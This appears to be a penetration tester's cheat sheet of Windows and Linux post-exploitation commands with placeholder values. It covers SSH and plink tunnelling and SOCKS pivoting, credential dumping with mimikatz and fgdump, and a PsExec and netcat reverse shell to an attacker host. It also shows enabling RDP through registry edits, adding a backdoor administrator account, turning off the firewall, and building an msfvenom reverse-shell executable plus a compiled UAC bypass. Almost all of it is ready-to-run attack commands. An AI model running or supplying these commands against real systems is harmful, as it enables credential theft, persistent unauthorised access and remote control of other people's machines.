apt install rinetd
cat /etc/rinetd.conf
ssh -N -L <LOCAL PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<TARGET IP>
ssh -N -L <BIND_ADRESS>:<PORT>:<TARGET IP>:<TARGET PORT> <USERNAME>@<HOP IP>
ssh -N -R <BIND_ADRESS>:<PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<ATTACKER IP>
sudo ssh -N -D 127.0.0.1:9000 <username>@<IP>
vim /etc/proxychains.conf
socks4 127.0.0.1 9000 #Change this value
#prepend proxychains command before every command to send through the proxychain.
plink.exe <USER>@<IP> -R <ATTACKER PORT>:<TARGET IP>:<TARGET PORT>
ssh -J <USER>@<FIRST HOP IP> -D 127.0.0.1:9000 <USER>@<SECOND IP>
Bring over mimikatz.exe using an SMB server.
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full"
fgdump.exe
type .....pwdump
Shell back to my machine with other user using netcat
PsExec.exe -u <COMPUTERNAME>\<USERNAME> -p <PASSWORD> \\<COMPUTERNAME> nc.exe <ATTACKER IP> <ATTACKER PORT> -e cmd.exe
#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Enable more then 1 user login
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
#Add user to RDP group
net user <USER> <PASS> /add /Y
net localgroup administrators <USER> /add
net localgroup "Remote Desktop Users" <USER> /add
#Disable firewall
netsh advfirewall set allprofiles state off
#RDP to machine
xfreerdp /u:<USER> /p:<PASS> /v:<TARGET>
msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o shell.exe
wget https://raw.githubusercontent.com/turbo/zero2hero/master/main.c
#change
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\shell.exe");
x86_64-w64-mingw32-gcc main.c -o bypassuac.exe
sudo nc -lnvp <PORT>